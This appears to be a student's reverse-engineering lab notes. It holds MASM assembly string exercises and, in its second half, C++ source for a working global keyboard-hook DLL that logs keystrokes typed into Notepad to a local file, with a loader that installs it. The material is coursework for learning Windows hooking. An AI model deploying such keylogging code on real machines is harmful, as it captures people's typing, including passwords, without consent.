12.24逆向工程上机作业整理
.386 .model flat, stdcall include kernel32.inc includelib kernel32.lib include msvcrt.inc includelib msvcrt.lib .data szText db "Reverse Engineering", 0 format db "length = %d", 0AH, 0 .code main PROC LEA EDI, szText MOV ECX,0FFFFFFFFH MOV AL,0 MOV BL,0 RE: CMP BYTE PTR [EDI],BL JZ EXIT INC EDI INC AX JMP RE EXIT: INVOKE crt_printf, addr format, AL INVOKE crt_getchar INVOKE ExitProcess, 0 main ENDP END main
1 .386 2 .model flat, stdcall 3 4 include kernel32.inc 5 includelib kernel32.lib 6 7 include msvcrt.inc 8 includelib msvcrt.lib 9 10 .data 11 szText db "Reverse Engineering", 0 12 chr db 'i' 13 format db "%d", 0AH, 0 14 15 .code 16 17 main PROC 18 LEA EDI, szText 19 MOV ECX,0FFFFFFFFH 20 ;LEA AX,chr 21 MOV BL,CHR 22 MOV AL,0 23 RE: 24 CMP BYTE PTR [EDI],BL 25 JZ EXIT 26 INC EDI 27 INC AL 28 JMP RE 29 EXIT: 30 31 32 INVOKE crt_printf, addr format, AL 33 INVOKE crt_getchar 34 INVOKE ExitProcess, 0 35 main ENDP 36 37 END main
1 .386 2 .model flat, stdcall 3 4 include kernel32.inc 5 includelib kernel32.lib 6 7 include msvcrt.inc 8 includelib msvcrt.lib 9 10 .data 11 format db "%d", 0AH, 0 12 szText db "Reverse Engineering", 0 13 szText2 db "Reverse Engineering", 0 ;szText==szText2 14 szText3 db "Reverse Eng", 0 ;szText>szText3 15 szText4 db "Reverse Engj", 0 ;szText<szText4 16 szText5 db "Reverse Engh", 0 ;szText>szText5 17 18 .code 19 20 main PROC 21 LEA ESI, szText 22 ;LEA EDI, szText2 ;result=0 23 ;LEA EDI, szText3 ;result=1 24 ;LEA EDI, szText4 ;result=-1 25 LEA EDI, szText5 ;result=1 26 START: 27 lodsb ;将ds:esi的第一个字节装入寄存器AL,同时[esi]+1 28 scasb ;将es:edi的第一个字节和AL相减,同时[edi]+1 29 jne NOTEQ ;为0时跳转 30 test al,al 31 jne START 32 xor eax,eax ;将EAX置0 33 jmp ENDCMP 34 NOTEQ: 35 mov eax,1 36 jg ENDCMP ;jl是小于 37 neg eax 38 ENDCMP: 39 40 41 INVOKE crt_printf, addr format, EAX 42 43 INVOKE crt_getchar 44 INVOKE ExitProcess, 0 45 main ENDP 46 47 END main
1 .386 2 .model flat, stdcall 3 4 include kernel32.inc 5 includelib kernel32.lib 6 7 include msvcrt.inc 8 includelib msvcrt.lib 9 10 .data 11 szText db "Reverse Engineering", 0 12 chr db 'j' 13 14 .code 15 16 main PROC 17 LEA EDI, szText 18 MOV ECX,0FFFFFFFFH 19 MOV BL,CHR 20 RE: 21 CMP BYTE PTR [EDI],BL 22 JZ EXIT 23 MOV [EDI],BL 24 INC EDI 25 JMP RE 26 EXIT: 27 INVOKE crt_printf, addr szText 28 29 INVOKE crt_getchar 30 INVOKE ExitProcess, 0 31 main ENDP 32 33 END main
#include "stdio.h" #include "windows.h" #include<fstream> #include<iostream> HINSTANCE g_hInstance = NULL; HHOOK g_hHook = NULL; HWND g_hWnd = NULL; BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved) {//第三个参数没有意义 switch (dwReason) { case DLL_PROCESS_ATTACH: g_hInstance = hinstDLL; break; case DLL_PROCESS_DETACH: break; } return TRUE; } LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam){ char szPath[MAX_PATH] = { 0, }; char *p = NULL; if (nCode >= 0) { std::ofstream out("D:\\reverse\\input.txt", std::ios::app); //输出流,记录键值 // bit 31 : 0 => press, 1 => release if (!(lParam & 0x80000000)) { GetModuleFileNameA(NULL, szPath, MAX_PATH); p = strrchr(szPath, '\\'); //若加载当前DLL的进程的可执行文件名称为notepad.exe,则消息不会传递给下一个钩子 if (!_stricmp(p + 1, "notepad.exe")) { BYTE ks[256]; GetKeyboardState(ks); WORD w; UINT scan; scan = 0; ToAscii(wParam, scan, ks, &w, 0); char ch = (char)w; out << ch; } } out.close(); } // 当前进程不是notepad.exe,将消息传递给下一个钩子 return CallNextHookEx(g_hHook, nCode, wParam, lParam); } #ifdef __cplusplus extern "C" { #endif __declspec(dllexport) void HookStart() { g_hHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstance, 0); } __declspec(dllexport) void HookStop() { if (g_hHook) { UnhookWindowsHookEx(g_hHook); g_hHook = NULL; } } #ifdef __cplusplus } #endif
#include "stdio.h" #include "conio.h" #include "windows.h" #define DEF_DLL_NAME "KeyHook.dll" #define DEF_HOOKSTART "HookStart" #define DEF_HOOKSTOP "HookStop" typedef void (*PFN_HOOKSTART)(); typedef void (*PFN_HOOKSTOP)(); void main() { HMODULE hDll = NULL; PFN_HOOKSTART HookStart = NULL; PFN_HOOKSTOP HookStop = NULL; char ch = 0; // KeyHook.dll hDll = LoadLibraryA(DEF_DLL_NAME); if( hDll == NULL ) { printf("LoadLibrary(%s) failed!!! [%d]", DEF_DLL_NAME, GetLastError()); return; } // export HookStart = (PFN_HOOKSTART)GetProcAddress(hDll, DEF_HOOKSTART); HookStop = (PFN_HOOKSTOP)GetProcAddress(hDll, DEF_HOOKSTOP); HookStart(); printf("press 'q' to quit!\n"); while( _getch() != 'q' ) ; HookStop(); FreeLibrary(hDll); }